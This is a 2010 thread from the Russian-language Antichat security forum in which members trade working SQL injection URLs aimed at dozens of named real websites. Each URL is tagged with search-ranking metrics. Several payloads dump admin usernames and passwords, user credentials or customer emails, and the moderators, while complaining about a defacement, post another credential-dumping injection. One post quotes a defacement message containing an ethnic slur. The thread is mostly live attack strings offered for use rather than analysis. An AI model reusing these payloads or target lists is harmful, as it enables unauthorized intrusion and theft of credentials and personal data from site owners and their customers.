HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.09.2010, 11:32
HakaR
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
Провел на форуме:
4435957

Репутация: 539
По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.synco.ru/razdel.php?id=-183+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4--[/COLOR][/COLOR] 
5.0.83-log:synco_db:synco@misantrop2
 
Ответить с цитированием

  #2  
Старый 05.09.2010, 11:42
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.kamosline.ru/articles/news/detail.php?ID=8169+and+1=0+UnIon+selECt+1,2,3,4,5, 6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+--+

ТИЦ: 20

http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,version(), 4,5,6,7,8,9,10,11,12,13,14,15+--+

ТИЦ: 50

http://www.maxipool.ru/articles_view.php?id=1+and+1=0+union+select+1,grou p_concat(table_name),3+from+information_schema.tab les--+

Google PageRank: 2

http://paritetbk.ru/?vs=home&page=foto&xx=1&razd_id=59+group+by+4+--+

http://www.smolensk-i.ru/view_article.php?news_id=234+and+1=0+union+select+ 1,2,3,version(),5,6,7+--+

ТИЦ: 20 Google PageRank: 3

http://www.fordimola.ru/?menu_id=1&page_id=656+group+by+7+--+

ТИЦ: 60

http://www.perepelcina.com/index.php?link=2&id=71+and+1=0+union+select+versio n(),2,3,4,5,6,7,8,9,10+--+

ТИЦ: 20 Google PageRank: 1

http://www.realtaim.ru/catalog?item_id=72+union+select+1,2,3,4,5,6,7,8,9, 10,11,12+--+

ТИЦ: 110 Google PageRank: 3

http://www.detki.ru/?page=-5+union+select+1,2,group_concat(table_name),4+from +information_schema.tables--+

ТИЦ: 190 Google PageRank: 4

http://www.rus-vent.ru/?menu=page&id=21+group+by+2+--+

ТИЦ : 80 PR: 3

http://www.garden-center.ru/morenews.php?mode=full&id=28+and+1=0+UnIon+selECt+ 1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from +information_schema.tables--+&marker=%CD%EE%E2%EE%F1%F2%E8

ТИЦ : 10 PR: 2

http://www.kiddypages.ru/index.php?item_full&t=import&id=-117+UnIon+selECt+1,group_concat%28table_name%29,3, 4,5,6,7,8,9,10,11,12,13,14,15+from+information_sch ema.tables+where+table_Schema=0x6b6964647970616765 73+--+

ТИЦ : 110
 
Ответить с цитированием

  #3  
Старый 05.09.2010, 12:46
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://www.mardesombras.com/mds/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 2

Код:
http://www.skflamurtari.com/flotakuqezi/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 3

Код:
http://www.mma-france.net/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 3

Код:
http://www.portalmotociclista.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

Код:
http://www.handi-occasion.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4


Код:
http://www.dama.in.rs/old_version/htdocs/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 2

Код:
http://www.tingis.be/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 3

Код:
http://www.palermoincosplay.net/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 0

Код:
http://www.mzonline.po.gs/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
Код:
http://www.bafraresim.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.cuisine-marocaine.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.vranjeportal.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.onodenje.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.festacirera.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 3

Код:
http://liveab1.de/xoops/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.linerider.fr/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 3

Код:
http://www.giovaniprofessionisti.it/it//modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 3

Код:
http://www.arabecontact.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 5

Код:
http://www.sintasa-se.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 2

Код:
http://www.portalmotociclista.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 1

Код:
http://www.cuisine-marocaine.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.allnight.it/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 2

http://www.opc4all.de/intern/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20co unt(*)%20from%20(select%201%20union%20select%202%2 0union%20select%203)x%20group%20by%20concat(versio n(),floor(rand(0)*2)))

тИЦ — 10

Код:
http://www.handi-occasion.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.onodenje.com/vip/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 4

Код:
http://www.sintasa-se.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))
тИЦ — 10

PR — 2
 
Ответить с цитированием

  #4  
Старый 05.09.2010, 13:59
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


По умолчанию

Цитата:
Сообщение от Kusto  
http://www.renewal-avto.ru/info.php?id=11+and+1=0+union+select+1,2,3,4,concat (login,char(58),password),6,7+from+avtorw.users+--+
и админко http://www.renewal-avto.ru/admin
вы мне обьясните НАХРЕНА БЫЛО ДЕФЕЙСИТЬ сайт да еще и со ссылкой на ачат???
 
Ответить с цитированием

  #5  
Старый 05.09.2010, 14:06
Lilo
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме:
6183433

Репутация: 1521


По умолчанию

Цитата:
Сообщение от Kusto  
вы мне обьясните
НАХРЕНА БЫЛО ДЕФЕЙСИТЬ сайт да еще и со ссылкой на ачат???
эт же круто писюн +10см

хотя я сам уже 5 сайтоф дефнул(за всё время),только своих, и то от злости=)
 
Ответить с цитированием

  #6  
Старый 05.09.2010, 14:13
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от Kusto  
вы мне обьясните
НАХРЕНА БЫЛО ДЕФЕЙСИТЬ сайт да еще и со ссылкой на ачат???
Код:
We are from Azerbaijan. Fuck you armenia!
боюсь они всю жизнь остануться такими же ламерами и смешными

99% дефейсер - k2b1~ aka LokbatanLi, которого забанили за неодекватное поведение и за дефейсы сайтов которые другие раскрутили

з.ы. не разазлите меня со своими глупо национальными дефейсами, а то плохо закончиться!
 
Ответить с цитированием

  #7  
Старый 05.09.2010, 14:24
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
По умолчанию

Цитата:
Сообщение от None  
http://www.protexin.com/animal/products.php?id=-6+union+select+group_concat(d_email,0x3c62723e)+fr om+customer_orders+--+
PR - 4

Цитата:
Сообщение от None  
http://www.sammygs.com/products.php?id=-6+union+select+1,group_concat(username,char(58),pa ssword,char(58),0x3c62723e),3,4,5,6,7,8+from+admin +--+
PR - 3

Цитата:
Сообщение от None  
http://www.nbjm-sprayer.com/products.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,version(),18,19,20,21,22+--+
PR - 4

Цитата:
Сообщение от None  
http://www.mahindraaustralia.com/products.php?act=viewSeries&id=-6+union+select+1,version(),3,4,5,6,7,8,9,10+--+
PR - 4

Цитата:
Сообщение от None  
http://www.regalrentals.co.za/products.php?id=-6+union+select+1,2,group_concat(username,char(58), passwd)+from+admin+--+
PR - 2

Цитата:
Сообщение от None  
http://vision-egy.net/products.php?id=-6+union+select+1,version(),3+--+


И вывести нечего



Цитата:
Сообщение от None  
http://www.everyway-medical.com/products.php?id=6=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version( ),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+


PR - 3
 
Ответить с цитированием

  #8  
Старый 05.09.2010, 15:05
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


По умолчанию

Цитата:
Сообщение от Konqi  
Код:
We are from Azerbaijan. Fuck you armenia!
боюсь они всю жизнь остануться такими же ламерами и смешными
99% дефейсер - k2b1~ aka LokbatanLi, которого забанили за неодекватное поведение и за дефейсы сайтов которые другие раскрутили
з.ы. не разазлите меня со своими глупо национальными дефейсами, а то плохо закончиться!

ну а теперь в продолжении темы дефейса, заметил что при переходе на главную задефейсенного сайта данные грузятся с http://trytobe.us/

Поэтому могу сказать- на дефейсь свой сайт

Код:
http://trytobe.us/account.php?id=-1+union+select+1,concat(login,char(58),user_password),3,4,5,6+from+users+--+
 
Ответить с цитированием

  #9  
Старый 05.09.2010, 16:53
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.unico94.ru/review/obzor_nalogi/?id=566+and+1=0+union+select+1,version()+--+

ТИЦ : 130

Так же есть доступ к mysql.user ,но нету прав на запись

http://xk5.com.ua/adv.php?id_sgroop=885+and+1=0+union+select+group_c oncat(schema_name)+from+information_schema.schemat a+--+

ТИЦ : 30 PR: 4

http://www.i-tilzit.ru/?id=26+and+1=0+union+select+1,group_concat(table_n ame),3+from+information_schema.tables+where+table_ schema=0x76657465725f6d61696e+--+

ТИЦ : 10 PR: 3

http://www.gorodetc.ru/business/index.php?id=12+union+select+1,group_concat(table_ name)+from+information_schema.tables+where+table_s chema=0x7975726963685f677264+--+

ТИЦ : 40 PR: 2

http://www.ibg-property.com/category.php?id=-4+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+--+

http://www.dipris.com/visual.php?article_id=186+and+1=0+union+select+1,2 ,version%28%29,4,5,6,7,8,9+--+

ТИЦ :10

есть доступ к mysql.user ,но нету прав на запись

http://www.songsuda.com/car_details.php?id=2+UnIon+selECt+1,2,3,4,group_co ncat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46+from+informati on_schema.tables+where+table_schema=0x736f6e677375 64615f646220--+

PR: 2

http://www.krasydom.ru/index.php?l_id=293+and+1=0+union+select+1,2,3,grou p_concat(schema_name),5,6+from+information_schema. schemata--+

ТИЦ : 40

Много схем к разным сайтам
 
Ответить с цитированием

  #10  
Старый 05.09.2010, 19:16
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

http://www.eowave.com/products.php?prod=9+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18+from+customer
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.